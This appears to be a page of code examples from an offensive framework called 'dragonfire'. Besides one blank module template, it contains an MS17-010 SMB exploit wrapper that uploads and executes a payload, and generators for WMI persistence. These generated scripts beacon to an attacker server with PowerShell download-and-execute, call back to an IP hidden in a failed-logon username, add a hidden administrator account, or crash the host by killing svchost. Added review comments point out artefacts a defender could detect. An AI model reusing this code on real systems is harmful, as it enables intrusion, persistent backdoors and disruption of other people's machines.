コード例 #1
class create:
    """Skeleton module: shows where the framework expects info, options and run()."""

    # Free-text description the framework shows when a user asks for this
    # module's info. Treat it as a short README; it is not parsed.
    info = '''
This is an info piece.
It will display whenever someone checks the info of this module
Consider it a small README
'''

    # Every option the framework may set on this module. Each entry must
    # have a matching setting(...) attribute of the same name below.
    option_list = ["option_a", "option_b", "option_c"]

    # Option definitions. setting(name, default, required, description)
    # comes from the framework, not from this file; every option needs a
    # value here even when that value is "". Keep descriptions short and
    # put longer explanations in `info`.
    option_a = setting("option_a", "value_a", False, "value for option_a")
    option_b = setting("option_b", "", True, "value for option_b")
    option_c = setting("option_c", "value_c", False, "value for option_c")

    def __init__(self):
        # Name under which the framework registers this module.
        self.name = "my_module_name"

    def run(self):
        """Print each option value, in option_list order.

        Option values arrive as strings and are not validated by the
        console, so any checking belongs at the top of this method.
        """
        print("These are the options I was passed and can use.")
        for option_name in self.option_list:
            print(getattr(self, option_name).value)
コード例 #2
class create:
    #define info here
    # Free-text description shown by the framework; it is not parsed.
    # NOTE(review): per this text the module wraps an MS17-010 (SMBv1)
    # exploit; on the defending side the relevant controls are the vendor
    # patch and disabling SMBv1.
    info = '''
MS17-010 exploit for Windows 2000 and later by sleepya
DRAGONFIRE: altered system call to upload and execute specified file, converted for dragonfire.
Note:
- The exploit should never crash a target (chance should be nearly 0%)
- Named pipe is needed
- Upload name is hard coded, might require changes to blend

Tested on:
- Windows 2016 x64
- Windows 10 Pro Build 10240 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1 x64
- Windows 2003 R2 SP2 x64
- Windows XP SP2 x64
- Windows 8.1 x86
- Windows 7 SP1 x86
- Windows 2008 SP1 x86
- Windows 2003 SP2 x86
- Windows XP SP3 x86
- Windows 2000 SP4 x86
'''                                                           #what is the 'information' or 'README'

    # Option names the framework may set; each one has a setting(...)
    # attribute of the same name below.
    option_list = ["target", "payload",
                   "pipe_name"]  #a list of all possible options

    # setting(name, default, required, description) is provided by the
    # framework, not by this file. "192.168.0.0" is a placeholder default.
    target = setting("target", "192.168.0.0", True, "Target IP address")
    payload = setting("payload", "/payloads/payload.exe", True,
                      "Payload to upload")
    # Optional; the description lists the pipe names the author expects.
    pipe_name = setting("pipe_name", "", False,
                        "browser, spoolss, netlogon, lsarpc, samr")

    # Leftover argv handling from the stand-alone script this module was
    # converted from; kept commented out by the original author.
    #if len(sys.argv) < 3:
    #	print("{} <ip> <file> [pipe_name]".format(sys.argv[0]))
    #	sys.exit(1)

    #target = sys.argv[1]

    def __init__(self):
        # Name the framework registers this module under.
        self.name = "ms17-10"

    def run(self):
        """Read the option values and hand them to exploit().

        exploit() is not defined in this file. An empty pipe_name option is
        normalised to None before the call; what exploit() does with None
        is not visible here. Option values arrive from the console as
        strings and are not otherwise validated.
        """
        target = self.target.value
        payload = self.payload.value
        pipe_name = self.pipe_name.value
        #        pipe_name=self.pipe_name.value
        # "" is the console's "not set" marker for an optional string.
        if len(pipe_name) < 1:
            pipe_name = None

#pipe_name = None #if len(pipe_name) < 1 else self.pipe_name.value

        exploit(target, pipe_name, payload)
        print('Own the Net!')
コード例 #3
class create:
    #define info here
    # Short interval table printed by run() when beacon_interval is
    # rejected. It lists 0-4 only, while run() accepts 0-5 and `info`
    # below lists option 5 as well.
    beacon_settings='''
Beacon_Interval:   How often you want the beacon.  Select a number from the list below.
                   0  -- Every 15 Seconds 
                   1  -- Every Minute
                   2  -- Every 15 Minutes
                   3  -- Every 30 Minutes
                   4  -- Every 1 Hour
'''

    # Free-text description shown by the framework; it is not parsed.
    info = '''
This module will build a script for the creation of the WMI objects required to install a WMI based windows beaconer.

Settings:
IP:                The IP address you want the beaconer to beacon to.
PORT:              The port to use.
PATH:              The name or path to the payload file on your web server.
Filter:            Name of the WMI filter.  
Consumer:          Name of the WMI consumer.
OutputFile:        Filename of the locally generated file.
Beacon_Interval:   How often you want the beacon.  Enter a number from the list below.  Anything else will cause the module to exit.
                   0  -- Every 15 Seconds 
                   1  -- Every Minute
                   2  -- Every 15 Minutes
                   3  -- Every 30 Minutes
                   4  -- Every 1 Hour
                   5  -- Every 4 Hours
Once the payload has been generated, either copy and paste the commands into a system level powershell, or download via a powershell download and execute.
''' 
    #create a list of possible options
    # Each name here has a setting(...) attribute of the same name below.
    option_list=["ip","port","path","filter","consumer","output_file","beacon_interval","use_ssl"]
   

    #initialize variables
    # setting(name, default, required, description) is provided by the
    # framework, not by this file. "1.1.1.1" is a placeholder default.
    # `filter` shadows the Python builtin of the same name (class scope only).
     
    ip=setting("ip","1.1.1.1",True,"beacon ip address")   
    port=setting("port","8080",True,"beacon port")
    path=setting("path","index.html",True,"path to download file on server")
    use_ssl=setting("use_ssl","no",True,"use SSL for callback?")
    filter=setting("filter","",True,"name of WMI filter")   
    consumer=setting("consumer","",True,"name of WMI consumer")
    output_file=setting("output_file","",False,"local output filename")
    beacon_interval=setting("beacon_interval","",True,"beacon interval...see info for options")
    
    #initialize power_beacon class
    def __init__(self):
        # Name the framework registers this module under.
        self.name="powerbeacon"
    def run(self) :
        """Build a PowerShell script that registers a WMI permanent event
        subscription, plus a matching removal script; print both or write
        them under output/.

        The generated script creates an __EventFilter (a Win32_LocalTime
        polling query chosen by beacon_interval), a CommandLineEventConsumer
        whose command is a PowerShell download-and-execute of
        http(s)://ip:port/path, and the __FilterToConsumerBinding joining
        them, all in root\\subscription. All option values arrive as strings.
        Returns None in every case; invalid options print a message and return.

        NOTE(review): objects in root\\subscription are a well-known
        persistence location and stay registered until the removal script
        is run; they can be enumerated with the WMI tooling on the host.
        """

        ip=self.ip.value
        port=self.port.value
        path=self.path.value
        filter=self.filter.value
        consumer=self.consumer.value
        output=self.output_file.value
        interval=self.beacon_interval.value
        beacon=self.beacon_settings
        use_ssl=self.use_ssl.value
        # Options are strings; a non-integer lands in the bare except,
        # which also swallows KeyboardInterrupt/SystemExit.
        try:
            interval=int(interval)           
        except:
            print "Invalid beacon_interval..."
            print beacon
            return
        # Accepted range is 0-5 even though `beacon` (printed above and
        # here) only documents 0-4.
        if (interval < 0) or (interval > 5):
            print "Invalid beacon_interval..."
            print beacon
            return
         
        # WQL query for the chosen interval. Each one polls Win32_LocalTime
        # (WITHIN 10 is the poll period) and fires on a Second/Minute/Hour
        # pattern. Note interval 2-5 use Minute=1 rather than Minute=0, so
        # they fire one minute past the boundary `info` describes.
        interval_setting=""
        if interval==1:
             interval_setting="$instanceFilter.Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Second=0\""
        if interval==2:
             interval_setting="$instanceFilter.Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LocalTime' AND (TargetInstance.Minute=1 OR TargetInstance.Minute=15 OR TargetInstance.Minute=30 OR TargetInstance.Minute=45) AND TargetInstance.Second=0\""
        if interval==3:
            interval_setting="$instanceFilter.Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LocalTime' AND (TargetInstance.Minute=1 OR TargetInstance.Minute=30) AND TargetInstance.Second=0\""
        if interval==4:
            interval_setting="$instanceFilter.Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LocalTime' AND (TargetInstance.Minute=1) AND TargetInstance.Second=0\""     
        if interval==5:
            interval_setting="$instanceFilter.Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LocalTime' AND (TargetInstance.Hour=0 OR TargetInstance.Hour=4 OR TargetInstance.Hour=8 OR TargetInstance.Hour=12 OR TargetInstance.Hour=16 OR TargetInstance.Hour=20) AND TargetInstance.Minute=1 AND TargetInstance.Second=0\""
        if interval==0:
            interval_setting="$instanceFilter.Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LocalTime' AND (TargetInstance.Second=0 OR TargetInstance.Second=15 OR TargetInstance.Second=30 OR TargetInstance.Second=45)\""

        # ip/port/path are concatenated verbatim; nothing is URL-escaped.
        address=ip + ":" + port + "/" + path
        # messageblock is substituted unquoted into CommandLineTemplate
        # below, so each branch supplies its own surrounding double quotes.
        if use_ssl == "no":
            messageblock="\"powershell -command `\"iex(New-Object Net.WebClient).DownloadString('http://%s')`\"\"" % (address)
        elif use_ssl == "yes":
            # The callback assignment disables TLS certificate validation
            # for the download; the command is then UTF-16LE + base64 for
            # `powershell -e`. b64encode is not imported in this file
            # (presumably `from base64 import b64encode` elsewhere).
            messageblock = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object Net.WebClient).DownloadString('https://%s')" % (address)
            encodedmessage = b64encode(messageblock.encode('UTF-16LE'))
            messageblock="\"powershell -e %s \"" % (encodedmessage)
        else:
            print "use_ssl must be either 'yes' or 'no'"
            return

        # Duplicate of the assignment above; harmless.
        address=ip + ":" + port + "/" + path
        # Install script: filter, consumer and binding. The Python escapes
        # in "\\\.\\root\subscription" are kept as the author wrote them.
        # %s order: interval_setting, filter name, consumer name, messageblock.
        data='''
$instanceFilter = ([wmiclass]"\\\.\\root\subscription:__EventFilter").CreateInstance()
$instanceFilter.QueryLanguage = "WQL"
%s
$instanceFilter.Name = "%s"
$instanceFilter.EventNamespace = 'root\cimv2'
$result = $instanceFilter.Put()
$newFilter = $result.Path
$instanceConsumer = ([wmiclass]"\\\.\\root\subscription:CommandLineEventConsumer").CreateInstance()
$instanceConsumer.Name = '%s' 
$instanceConsumer.CommandLineTemplate  = %s
$result = $instanceConsumer.Put()
$newConsumer = $result.Path
$instanceBinding = ([wmiclass]"\\\.\\root\subscription:__FilterToConsumerBinding").CreateInstance()
$instanceBinding.Filter = $newFilter
$instanceBinding.Consumer = $newConsumer
$result = $instanceBinding.Put()
$newBinding = $result.Path

''' % (interval_setting,filter,consumer,messageblock)

        # Removal script: deletes the filter, the consumer and the binding
        # by name. %s order: filter, consumer, consumer, filter.
        remove_data= '''
$x="\\\.\\root\subscription:__EventFilter.Name='%s'"
([wmi]$x).Delete() 
$x="\\\.\\root\subscription:CommandLineEventConsumer.Name='%s'"
([wmi]$x).Delete()
$x='\\\.\\root\subscription:__FilterToConsumerBinding.Consumer="\\\\\\\\.\\\\root\\\\subscription:CommandLineEventConsumer.Name=\\"%s\\"",Filter="\\\\\\\\.\\\\root\\\\subscription:__EventFilter.Name=\\"%s\\""' 
([wmi]$x).Delete() 
''' % (filter,consumer,consumer,filter)
        
        # No output_file: print both scripts to the console.
        if output=='':
            print data
            print "\n"
            print "To Remove"
            print "---------------------------------"
            print remove_data
            return
        else:
            # Written to "output/" + the raw option value: the directory
            # must already exist, and the value is not sanitised, so a
            # name containing "/" or ".." writes outside output/.
            output="output/"+output
            f = open(output,'w')
            f.write(data)
            f.close()
            # Removal script goes next to it with a "_remove" suffix.
            output=output+"_remove"
            f = open(output,'w')
            f.write(remove_data)
            f.close()
            print "Files have been written..."
            return
コード例 #4
class create:
    #define info here

    # Free-text description shown by the framework; it is not parsed.
    # The second example documents the trigger convention used by run():
    # the callback IP is hex-encoded after '@' in the failing username.
    info = '''
This is the failsafe for windows persistence module.  After installing on a target, failing to login with 'FailName' perform a callback to a specified IP"

Once the payload has been generated, either copy and paste the commands into a system level powershell, or download via a powershell download and execute.

Ex:
winexe -U user%password //192.168.0.100 "powershell -c iex(New-Object Net.WebClient).DownloadString('http://192.168.0.136:8080/failsafe')"

#FAIL TO LOGIN
#After installed, fail to login with FailName@[CALLBACK_IP]    example is for 127.0.0.1
winexe -U FailName@7F000001%password //192.168.0.100

'''
    #create a list of possible options
    # Each name here has a setting(...) attribute of the same name below.
    option_list = [
        "FailName", "callback_port", "callback_file", "filter", "consumer",
        "reset_auditpol", "use_ssl", "output_file"
    ]

    #initialize variables
    # setting(name, default, required, description) is provided by the
    # framework, not by this file. `filter` shadows the Python builtin
    # (class scope only).

    FailName = setting("FailName", "", True, "Name to fail logon")
    filter = setting("filter", "ServiceFilter", True, "name of WMI filter")
    consumer = setting("consumer", "ServiceConsumer", True,
                       "name of WMI consumer")
    callback_port = setting("callback_port", "4444", True, "Callback Port")
    callback_file = setting("callback_file", "", True,
                            "Powershell file to get after failed login")
    reset_auditpol = setting(
        "reset_auditpol", "yes", True,
        "Upon uninstall, reset auditpolicy to NOT log failures?")
    use_ssl = setting("use_ssl", "no", True,
                      "Set to 'yes' if you want to use SSL")
    output_file = setting("output_file", "", False, "local output filename")

    #initialize power_beacon class
    def __init__(self):
        # Name the framework registers this module under.
        self.name = "powerbeacon"

    def run(self):
        """Build an install script and a removal script for the WMI
        "failsafe" callback, then print them or write them under output/.

        The install script enables failed-logon auditing, registers a WMI
        __EventFilter on Security event 4625 and a CommandLineEventConsumer
        whose command re-checks the newest 4625 for FailName and, on a
        match, runs the base64 PowerShell built below. That PowerShell
        splits the matched event text at '@' and treats the part after it
        as a hex IP ("0x" + ...), matching the FailName@7F000001 example in
        `info`. All option values arrive as strings. Returns None always.

        NOTE(review): the auditpol change and the root\\subscription objects
        created here are both host-observable; a logon failure whose user
        name carries '@' plus a hex string is the trigger to look for.
        """

        FailName = self.FailName.value
        filter = self.filter.value
        consumer = self.consumer.value
        output = self.output_file.value
        callback_port = self.callback_port.value
        callback_file = self.callback_file.value
        reset_auditpol = self.reset_auditpol.value
        use_ssl = self.use_ssl.value

        # Both branches are identical except for the URL scheme and, in the
        # https branch, the callback that disables TLS certificate
        # validation. Any value other than "no" takes the https branch here;
        # values other than yes/no are rejected further down, before output.
        # %s order: FailName, FailName, callback_port, callback_file (none
        # of them quoted or escaped).
        if use_ssl == "no":
            messageblock = '''if(wevtutil qe security /rd:true /f:text /c:1 /q:\"*[System/EventID=4625]\" | findstr /i %s){$x=(wevtutil qe security /rd:true /f:text /c:1 /q:\"*[System/EventID=4625]\" | findstr /i %s).split('@');iex(New-Object Net.WebClient).DownloadString('http://0x'+$x[1]+':%s/%s')}''' % (
                FailName, FailName, callback_port, callback_file)

        else:
            messageblock = '''if(wevtutil qe security /rd:true /f:text /c:1 /q:\"*[System/EventID=4625]\" | findstr /i %s){$x=(wevtutil qe security /rd:true /f:text /c:1 /q:\"*[System/EventID=4625]\" | findstr /i %s).split('@');[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object Net.WebClient).DownloadString('https://0x'+$x[1]+':%s/%s')}''' % (
                FailName, FailName, callback_port, callback_file)

        # UTF-16LE + base64 is the encoding `powershell -e` expects.
        # b64encode is not imported in this file (presumably
        # `from base64 import b64encode` elsewhere).
        encodedmessage = b64encode(messageblock.encode('UTF-16LE'))

        # Install script. The Python escapes in "\\\.\\root\subscription"
        # are kept as the author wrote them.
        # %s order: filter name, consumer name, FailName, encodedmessage.
        data = '''
auditpol /set /subcategory:"Logon" /success:enable /failure:enable
$instanceFilter = ([wmiclass]"\\\.\\root\subscription:__EventFilter").CreateInstance()
$instanceFilter.QueryLanguage = "WQL"
$instanceFilter.Query ="select * from __InstanceCreationEvent where TargetInstance isa 'Win32_NtLogEvent' and TargetInstance.logfile = 'Security' and (TargetInstance.EventCode = '4625')"
$instanceFilter.Name = "%s"
$instanceFilter.EventNamespace = 'root\cimv2'
$result = $instanceFilter.Put()
$newFilter = $result.Path
$instanceConsumer = ([wmiclass]"\\\.\\root\subscription:CommandLineEventConsumer").CreateInstance()
$instanceConsumer.Name = '%s'
$instanceConsumer.CommandLineTemplate  = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\powershell.exe -c "if(wevtutil qe security /rd:true /f:text /c:1 /q:`"*[System/EventID=4625]`" | findstr /i %s){powershell -e %s}"'
$result = $instanceConsumer.Put()
$newConsumer = $result.Path
$instanceBinding = ([wmiclass]"\\\.\\root\subscription:__FilterToConsumerBinding").CreateInstance()
$instanceBinding.Filter = $newFilter
$instanceBinding.Consumer = $newConsumer
$result = $instanceBinding.Put()
$newBinding = $result.Path

''' % (filter, consumer, FailName, encodedmessage)
        # Removal script. The auditpol reset (failure auditing off) is
        # prepended only when reset_auditpol is "yes"; the sibling module
        # that has the same option appends it at the end instead.
        remove_data = ''
        if reset_auditpol == "yes":
            remove_data = '''
auditpol /set /subcategory:"Logon" /success:enable /failure:disable
'''
        # Deletes filter, consumer and binding by name.
        # %s order: filter, consumer, consumer, filter.
        remove_data += '''
$x="\\\.\\root\subscription:__EventFilter.Name='%s'"
([wmi]$x).Delete() 
$x="\\\.\\root\subscription:CommandLineEventConsumer.Name='%s'"
([wmi]$x).Delete()
$x='\\\.\\root\subscription:__FilterToConsumerBinding.Consumer="\\\\\\\\.\\\\root\\\\subscription:CommandLineEventConsumer.Name=\\"%s\\"",Filter="\\\\\\\\.\\\\root\\\\subscription:__EventFilter.Name=\\"%s\\""' 
([wmi]$x).Delete() 
''' % (filter, consumer, consumer, filter)
        # Validation happens after the strings are built but before any
        # output, so a bad value only costs the wasted work above.
        if (reset_auditpol != "yes") and (reset_auditpol != "no"):
            print "reset_auditpol must be 'yes' or 'no'"
            return
        if (use_ssl != "yes") and (use_ssl != "no"):
            print "use_ssl must be either yes or no"
            return
        # No output_file: print both scripts to the console.
        if output == '':
            print data
            print "\n"
            print "To Remove"
            print "---------------------------------"
            print remove_data
            return
        else:
            # Written to "output/" + the raw option value: the directory
            # must already exist, and the value is not sanitised, so a
            # name containing "/" or ".." writes outside output/.
            output = "output/" + output
            f = open(output, 'w')
            f.write(data)
            f.close()
            # Removal script goes next to it with a "_remove" suffix.
            output = output + "_remove"
            f = open(output, 'w')
            f.write(remove_data)
            f.close()
            print "Files have been written..."
            return
コード例 #5
class create:
    #define info here

    # Free-text description shown by the framework; it is not parsed.
    info = '''
This is the failsafe for windows persistence module.  After installing on a target, failing to login with 'FailName' will create an admin account called "CreateName"

Once the payload has been generated, either copy and paste the commands into a system level powershell, or download via a powershell download and execute.

Ex:
winexe -U user%password //192.168.0.100 "powershell -c iex(New-Object Net.WebClient).DownloadString('http://192.168.0.136:8080/persist')"

'''
    #create a list of possible options
    # Each name here has a setting(...) attribute of the same name below.
    option_list = [
        "FailName", "CreateName", "password", "filter", "consumer",
        "output_file"
    ]

    #initialize variables
    # setting(name, default, required, description) is provided by the
    # framework, not by this file. `filter` shadows the Python builtin
    # (class scope only). The password default is the literal "password".

    FailName = setting("FailName", "", True, "Name to fail logon")
    CreateName = setting("CreateName", "", True, "New Username to add")
    password = setting("password", "password", True, "PW for new user")
    filter = setting("filter", "ServiceFilter", True, "name of WMI filter")
    consumer = setting("consumer", "ServiceConsumer", True,
                       "name of WMI consumer")
    output_file = setting("output_file", "", False, "local output filename")

    #initialize power_beacon class
    def __init__(self):
        # Name the framework registers this module under.
        self.name = "powerbeacon"

    def run(self):
        """Build an install script and a removal script for the WMI
        "failsafe" account creator, then print them or write them under
        output/.

        The install script enables failed-logon auditing, registers a WMI
        __EventFilter on Security event 4625 and a CommandLineEventConsumer
        whose command re-checks the newest 4625 for FailName and, on a
        match, runs `net users ... /add` and `net localgroup administrators
        ... /add` with CreateName/password. Unlike the sibling modules there
        is no reset_auditpol option: the removal script always disables
        failure auditing and deletes the account. All option values arrive
        as strings and none of them is validated. Returns None always.

        NOTE(review): CreateName, password and FailName are substituted into
        the consumer command line unquoted, so the password is stored in
        cleartext in the WMI consumer object, and a value containing
        spaces or shell metacharacters changes the command. Local account
        creation and admin-group changes are typically audited events.
        """

        FailName = self.FailName.value
        password = self.password.value
        CreateName = self.CreateName.value
        filter = self.filter.value
        consumer = self.consumer.value
        output = self.output_file.value

        # Install script. The Python escapes in "\\\.\\root\subscription"
        # are kept as the author wrote them.
        # %s order: filter, consumer, FailName, CreateName, password, CreateName.
        data = '''
auditpol /set /subcategory:"Logon" /success:enable /failure:enable
$instanceFilter = ([wmiclass]"\\\.\\root\subscription:__EventFilter").CreateInstance()
$instanceFilter.QueryLanguage = "WQL"
$instanceFilter.Query ="select * from __InstanceCreationEvent where TargetInstance isa 'Win32_NtLogEvent' and TargetInstance.logfile = 'Security' and (TargetInstance.EventCode = '4625')"
$instanceFilter.Name = "%s"
$instanceFilter.EventNamespace = 'root\cimv2'
$result = $instanceFilter.Put()
$newFilter = $result.Path
$instanceConsumer = ([wmiclass]"\\\.\\root\subscription:CommandLineEventConsumer").CreateInstance()
$instanceConsumer.Name = '%s' 
$instanceConsumer.CommandLineTemplate  = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\powershell.exe -c "if(wevtutil qe security /rd:true /f:text /c:1 /q:`"*[System/EventID=4625]`" | findstr /i %s){cmd /c net users %s %s /add `&`& net localgroup administrators %s /add}"'
$result = $instanceConsumer.Put()
$newConsumer = $result.Path
$instanceBinding = ([wmiclass]"\\\.\\root\subscription:__FilterToConsumerBinding").CreateInstance()
$instanceBinding.Filter = $newFilter
$instanceBinding.Consumer = $newConsumer
$result = $instanceBinding.Put()
$newBinding = $result.Path

''' % (filter, consumer, FailName, CreateName, password, CreateName)

        # Removal script: turns failure auditing back off, deletes the
        # created account, then deletes filter, consumer and binding.
        # %s order: CreateName, filter, consumer, consumer, filter.
        remove_data = '''
auditpol /set /subcategory:"Logon" /success:enable /failure:disable
net users %s /delete
$x="\\\.\\root\subscription:__EventFilter.Name='%s'"
([wmi]$x).Delete() 
$x="\\\.\\root\subscription:CommandLineEventConsumer.Name='%s'"
([wmi]$x).Delete()
$x='\\\.\\root\subscription:__FilterToConsumerBinding.Consumer="\\\\\\\\.\\\\root\\\\subscription:CommandLineEventConsumer.Name=\\"%s\\"",Filter="\\\\\\\\.\\\\root\\\\subscription:__EventFilter.Name=\\"%s\\""' 
([wmi]$x).Delete() 
''' % (CreateName, filter, consumer, consumer, filter)

        # No output_file: print both scripts to the console.
        if output == '':
            print data
            print "\n"
            print "To Remove"
            print "---------------------------------"
            print remove_data
            return
        else:
            # Written to "output/" + the raw option value: the directory
            # must already exist, and the value is not sanitised, so a
            # name containing "/" or ".." writes outside output/.
            output = "output/" + output
            f = open(output, 'w')
            f.write(data)
            f.close()
            # Removal script goes next to it with a "_remove" suffix.
            output = output + "_remove"
            f = open(output, 'w')
            f.write(remove_data)
            f.close()
            print "Files have been written..."
            return
コード例 #6
class create:
    #define info here

    # Free-text description shown by the framework; it is not parsed.
    # Unlike the sibling "failsafe" modules this one is destructive: per
    # this text the triggered action crashes the host.
    info = '''
This module creates a WMI filter where failing to logon with 'FailName' crashed the box by deleting running instances of svchost.

Once the payload has been generated, either copy and paste the commands into a system level powershell, or download via a powershell download and execute.

Ex:
winexe -U user%password //192.168.0.100 "powershell -c iex(New-Object Net.WebClient).DownloadString('http://192.168.0.136:8080/persist')"

''' 
    #create a list of possible options
    # Each name here has a setting(...) attribute of the same name below.
    option_list=["FailName","filter","consumer","output_file","reset_auditpol"]
   

    #initialize variables
    # setting(name, default, required, description) is provided by the
    # framework, not by this file. `filter` shadows the Python builtin
    # (class scope only).
     
    FailName=setting("FailName","",True,"Name to fail logon")
    filter=setting("filter","ServiceFilter",True,"name of WMI filter")   
    consumer=setting("consumer","ServiceConsumer",True,"name of WMI consumer")
    output_file=setting("output_file","",False,"local output filename")
    reset_auditpol=setting("reset_auditpol","yes",True,"reset auditpol on removal?")
    
    #initialize power_beacon class
    def __init__(self):
        # Name the framework registers this module under.
        self.name="powerbeacon"
    def run(self) :
        """Build an install script and a removal script for the WMI
        "failsafe" trigger, then print them or write them under output/.

        The install script enables failed-logon auditing, registers a WMI
        __EventFilter on Security event 4625 and a CommandLineEventConsumer
        whose command re-checks the newest 4625 for FailName and, on a
        match, runs a fixed base64 (UTF-16LE) PowerShell command that,
        per `info`, deletes running svchost instances. The base64 is
        hard-coded here rather than built at run time as in the sibling
        modules. All option values arrive as strings; only reset_auditpol
        is validated, and only after the scripts are built. Returns None.

        NOTE(review): the auditpol change and the root\\subscription objects
        created here are host-observable; a logon failure for FailName is
        the trigger.
        """

        FailName=self.FailName.value
        filter=self.filter.value
        consumer=self.consumer.value
        output=self.output_file.value
        reset_auditpol=self.reset_auditpol.value
         
        # Install script. The Python escapes in "\\\.\\root\subscription"
        # are kept as the author wrote them. FailName is substituted into
        # the consumer command line unquoted.
        # %s order: filter, consumer, FailName.
        data= '''
auditpol /set /subcategory:"Logon" /success:enable /failure:enable
$instanceFilter = ([wmiclass]"\\\.\\root\subscription:__EventFilter").CreateInstance()
$instanceFilter.QueryLanguage = "WQL"
$instanceFilter.Query ="select * from __InstanceCreationEvent where TargetInstance isa 'Win32_NtLogEvent' and TargetInstance.logfile = 'Security' and (TargetInstance.EventCode = '4625')"
$instanceFilter.Name = "%s"
$instanceFilter.EventNamespace = 'root\cimv2'
$result = $instanceFilter.Put()
$newFilter = $result.Path
$instanceConsumer = ([wmiclass]"\\\.\\root\subscription:CommandLineEventConsumer").CreateInstance()
$instanceConsumer.Name = '%s' 
$instanceConsumer.CommandLineTemplate  = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\powershell.exe -c "if(wevtutil qe security /rd:true /f:text /c:1 /q:`"*[System/EventID=4625]`" | findstr /i %s){powershell -e dwBtAGkAYwAgAHAAcgBvAGMAZQBzAHMAIAB3AGgAZQByAGUAIABuAGEAbQBlAD0AYAAnAHMAdgBjAGgAbwBzAHQALgBlAHgAZQBgACcAIABkAGUAbABlAHQAZQA=}"'
$result = $instanceConsumer.Put()
$newConsumer = $result.Path
$instanceBinding = ([wmiclass]"\\\.\\root\subscription:__FilterToConsumerBinding").CreateInstance()
$instanceBinding.Filter = $newFilter
$instanceBinding.Consumer = $newConsumer
$result = $instanceBinding.Put()
$newBinding = $result.Path

''' % (filter,consumer,FailName)

        # Removal script: deletes filter, consumer and binding by name.
        # %s order: filter, consumer, consumer, filter.
        remove_data= '''
$x="\\\.\\root\subscription:__EventFilter.Name='%s'"
([wmi]$x).Delete() 
$x="\\\.\\root\subscription:CommandLineEventConsumer.Name='%s'"
([wmi]$x).Delete()
$x='\\\.\\root\subscription:__FilterToConsumerBinding.Consumer="\\\\\\\\.\\\\root\\\\subscription:CommandLineEventConsumer.Name=\\"%s\\"",Filter="\\\\\\\\.\\\\root\\\\subscription:__EventFilter.Name=\\"%s\\""' 
([wmi]$x).Delete() 
''' % (filter,consumer,consumer,filter)
        # Validated only now, after both scripts are built (same pattern as
        # the sibling modules); an invalid value still returns before output.
        if (reset_auditpol!="yes" and reset_auditpol!="no"):
            print "Enter 'yes' or 'no' for 'reset_auditpol'"
            return
        else:
            # Appended at the end of remove_data (the sibling module with
            # this option prepends it). remove_data already ends with a
            # newline, so the line lands on its own row.
            if reset_auditpol=="yes":
                remove_data=remove_data+"auditpol /set /subcategory:\"Logon\" /success:enable /failure:disable"

        # No output_file: print both scripts to the console.
        if output=='':
            print data
            print "\n"
            print "To Remove"
            print "---------------------------------"
            print remove_data
            return
        else:
            # Written to "output/" + the raw option value: the directory
            # must already exist, and the value is not sanitised, so a
            # name containing "/" or ".." writes outside output/.
            output="output/"+output
            f = open(output,'w')
            f.write(data)
            f.close()
            # Removal script goes next to it with a "_remove" suffix.
            output=output+"_remove"
            f = open(output,'w')
            f.write(remove_data)
            f.close()
            print "Files have been written..."
            return